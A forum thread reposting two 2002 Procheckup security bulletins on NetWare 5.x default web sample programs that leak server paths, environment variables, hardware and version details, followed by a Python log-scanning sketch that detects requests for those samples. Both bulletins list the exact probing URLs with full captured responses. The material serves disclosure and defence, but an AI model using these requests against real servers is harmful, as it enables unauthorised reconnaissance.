Thread: Vulnerability in Novell Netware 5.0

  1. #1
    Senior Member
    Join Date
    Nov 2001
    Posts
    742

    Vulnerability in Novell Netware 5.0 (part1)

    Source: bugtraq@securityfocus.com

    Procheckup Ltd http://www.procheckup.com
    Procheckup Security Bulletin PR02-1


    Description: Netware default programs display server
    variables including web root location
    Date: 8/1/2002

    Application: Netware enterprise web server
    Platform: Novell NetWare 5.0
    Severity: Remote attackers can discover the location of the webroot.
    Authors: Richard Brain [richard.brain@procheckup.com]
    Vendor Status:
    CVE Candidate: Not assigned
    Reference: http://www.procheckup.com/security_info/vuln.html

    Description:
    NetWare 5.1 installed with default settings, installs with
    the Novonyx webserver. This webserver resides on port 80
    and comes with sample files which disclose information


    1) Requesting the following url :-

    http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse

    The following information is returned:-

    Here are the ScriptEase:WSE input values
    _argv[-1] = "SEWSE"
    _argv[0] = "SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/ALLFIELD.JSE"

    Current directory is NETWARE/SYS:/Novonyx/suitespot/docs/sewse/misc
    Here are the cgi.getVar() values
    Here are the Clib.getenv() values
    HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
    HTTP_REFERER=http://192.168.1.109/sewse/arcade.htm
    HTTP_ACCEPT_LANGUAGE=en-gb
    HTTP_ACCEPT_ENCODING=gzip, deflate
    HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; EncExt; T312461; Q312461)
    HTTP_HOST=192.168.1.109
    HTTP_CONNECTION=Keep-Alive
    HTTP_COOKIE=N2S19P61=963269677
    ADMSERV_ROOT=/Novonyx/suitespot/admin-serv/config
    NETSITE_ROOT=/novonyx/suitespot
    SERVER_NAMES=lcgi
    ADMSERV_PWD=User: NS-value-is-null Password: NS-value-is-null Authorization: NS-value-is-null UserDN: NS-value-is-null
    SERVER_SOFTWARE=Netscape 3.5 for NetWare
    SERVER_PORT=80
    SERVER_NAME=NETWARE.PROCHECKUP.COM
    SERVER_URL=http://192.168.1.109
    REMOTE_HOST=192.168.1.250
    REMOTE_ADDR=192.168.1.250
    HTTPS=OFF
    GATEWAY_INTERFACE=LCGI/1.1
    SERVER_PROTOCOL=HTTP/1.1
    REQUEST_METHOD=GET
    SCRIPT_NAME=/lcgi/sewse.nlm
    QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
    NS_SESSION=-751448704
    NS_REQUEST=-695399320
    FN=lcgi_map_init
    PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
    CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/

    ==========================================================

    2) ALSO

    Requesting the following url :-
    http://192.168.1.109/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse

    The following information is returned:-

    SERVER_SOFTWARE=Netscape 3.5 for NetWare
    SERVER_PORT=80
    SERVER_NAME=NETWARE.PROCHECKUP.COM
    SERVER_URL=http://192.168.1.109
    REMOTE_HOST=192.168.1.250
    REMOTE_ADDR=192.168.1.250
    HTTPS=OFF
    GATEWAY_INTERFACE=LCGI/1.1
    SERVER_PROTOCOL=HTTP/1.1
    REQUEST_METHOD=GET
    SCRIPT_NAME=/lcgi/sewse.nlm
    QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/test.jse

    NS_SESSION=-798892160
    NS_REQUEST=-800372600
    FN=lcgi_map_init
    PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot
    CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/
    http://192.168.1.109

    3) ALSO

    Requesting the following url :-
    http://webserver/perl/samples/env.pl

    The following information is returned:-

    HSERVER_SOFTWARE Netscape 3.5 for NetWare
    GATEWAY_INTERFACE LCGI/1.1
    NS_SESSION -707141760
    REMOTE_ADDR 192.168.1.250
    SERVER_PROTOCOL HTTP/1.1
    NS_REQUEST -695399320
    PATH_INFO_TRANSLATED /novonyx/suitespot/docs/samples/env.pl
    REQUEST_METHOD GET
    REMOTE_HOST 192.168.1.250
    SERVER_URL http://192.168.1.109
    SERVER_NAMES perl
    HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; EncExt; T312461; Q312461)
    HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
    HTTP_CONNECTION Keep-Alive
    HTTP_ACCEPT_LANGUAGE en-gb
    HTTPS OFF
    CONFIG_DIR /NOVONYX/SUITESPOT/https-NETWARE/config/
    FN lcgi_map_init
    SCRIPT_NAME /perl
    HTTP_ACCEPT_ENCODING gzip, deflate
    ADMSERV_ROOT /Novonyx/suitespot/admin-serv/config
    PERL_ROOT SYS:novonyx/suitespot/docs/perlroot
    SERVER_NAME NETWARE.PROCHECKUP.COM
    PATH_INFO /samples/env.pl
    HTTP_COOKIE N2S19P61=963269677
    SERVER_PORT 80
    ADMSERV_PWD User: NS-value-is-null Password: NS-value-is-null Authorization: NS-value-is-null UserDN: NS-value-is-null
    HTTP_HOST 192.168.1.109
    PATH_TRANSLATED SYS:novonyx/suitespot/docs/perlroot/samples/env.pl
    NETSITE_ROOT /novonyx/suitespot

    Solution:

    Delete all default example programs if not needed.

    Legal:

    Copyright 2002 Procheckup Ltd. All rights reserved.

    Permission is granted for copying and circulating this
    Bulletin to the Internet community for the purpose of
    alerting them to problems, if and only if, the Bulletin is
    not edited or changed in any way, is attributed to
    Procheckup, and provided such reproduction and/or
    distribution is performed for non-commercial purposes.


    Any other use of this information is prohibited. Procheckup
    is not liable for any misuse of this information by any
    third party.

    --------------------------------------------------------------------------------

  2. #2
    Senior Member
    Join Date
    Nov 2001
    Posts
    742
    Vulnerability in Novell Netware 5.0 (part2)

    Source: bugtraq@securityfocus.com

    Procheckup Ltd
    http://www.procheckup.com
    Procheckup Security Bulletin PR02-3


    Description:
    Netware default programs display server
    information to attackers.
    Date: 8/1/2002

    Application: Netware enterprise web server
    Platform: Novell NetWare 5.0
    Severity: Remote attackers can discover the location of the webroot
    Authors: Richard Brain [richard.brain@procheckup.com]
    Vendor Status:
    CVE Candidate: Not assigned
    Reference: http://www.procheckup.com/security_info/vuln.html

    Description:
    NetWare 5.1 installed with default settings, installs with
    the Novonyx webserver. This webserver resides on port 80
    and comes with sample files which disclose information.

    1) Requesting the following url :-

    http://webserver/perl/samples/lancgi.pl

    Gives lan board details.

    Lan Boards

    Description                           Address       Media Type      Board Number  Board Instance
    Compaq Ethernet or Fast Ethernet NIC  658B50004354  ETHERNET_802.2  1             1
    Compaq Ethernet or Fast Ethernet NIC  658B50004354  ETHERNET_II     2             1

    2) Requesting the following url :-

    http://webserver/perl/samples/volscgi.pl

    Gives the volume names with status information

    Volumes

    Description  Total Space  Free Space  Block Size  Total Dir
    SYS          6065984      5390848     65536       66048

    3) Requesting the following url :-

    http://webserver/perl/samples/ndslogin.pl

    Seems to allow remote interactive logins.... with NDS tree
    viewing

    Login to NDS and enumerate the contents

    ------------------------------------------------------------

    Fullname: ex: nds:\\novell_tree\novell_context
    Username: *

    Password:

    4) Requesting the following url :-

    http://webserver/netbasic/websinfo.bas

    Gives the server name and exact netware version running

    Company: Novell
    Revision: NetWare 5.00i
    Date: 27 March 2000

    Solution:

    Delete all default example programs if not needed.

    Legal:

    Copyright 2002 Procheckup Ltd. All rights reserved.

    Permission is granted for copying and circulating this
    Bulletin to the Internet community for the purpose of
    alerting them to problems, if and only if, the Bulletin is
    not edited or changed in any way, is attributed to
    Procheckup, and provided such reproduction and/or
    distribution is performed for non-commercial purposes.


    Any other use of this information is prohibited. Procheckup
    is not liable for any misuse of this information by any
    third party.


    --------------------------------------------------------------------------------
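
A detection sketch for the sample programs both bulletins list, added here and not part of the original bulletins or forum posts: it scans web server access log lines for requests to those paths and reports which samples were still being served. The Common Log Format layout, the function names and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Sample programs named in the two bulletins, lower-cased for comparison.
SAMPLE_PATHS = {
    "/perl/samples/env.pl", "/perl/samples/lancgi.pl",
    "/perl/samples/volscgi.pl", "/perl/samples/ndslogin.pl",
    "/netbasic/websinfo.bas",
}
# sewse.nlm runs the script named in the query string (two samples shown).
SEWSE_PATH = "/lcgi/sewse.nlm"
SEWSE_SAMPLES = {
    "sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse",
    "sys:/novonyx/suitespot/docs/sewse/misc/test.jse",
}
# Assumption: the access log is in Common Log Format.
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jan/2002:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.77 - - [08/Jan/2002:10:02:13 +0000] "GET /perl/samples/env.pl HTTP/1.0" 200 2210',
    '192.0.2.77 - - [08/Jan/2002:10:02:15 +0000] "GET /LCGI/SEWSE.NLM?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse HTTP/1.0" 200 3102',
    '192.0.2.77 - - [08/Jan/2002:10:02:19 +0000] "GET /netbasic/%77ebsinfo.bas HTTP/1.0" 404 210',
]

def classify(target):
    # Decode twice to catch double encoding; NetWare paths are not case sensitive.
    t = unquote(unquote(target)).lower().replace("\\", "/")
    path, _, query = t.partition("?")
    path = re.sub(r"/+", "/", path)
    if path in SAMPLE_PATHS:
        return path
    if path == SEWSE_PATH and query in SEWSE_SAMPLES:
        return path + "?" + query
    return None

def find_sample_hits(lines):
    """Return (client, status, sample) for every request to a sample program."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        sample = classify(m.group(2)) if m else None
        if sample:
            hits.append((m.group(1), m.group(3), sample))
    return hits

def still_installed(hits):
    """Samples answered with 200 are still on the server and should be deleted."""
    return sorted({sample for _, status, sample in hits if status == "200"})
```

A 200 response for any of these paths means the bulletin's solution (delete the default example programs) has not yet been applied on that server.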
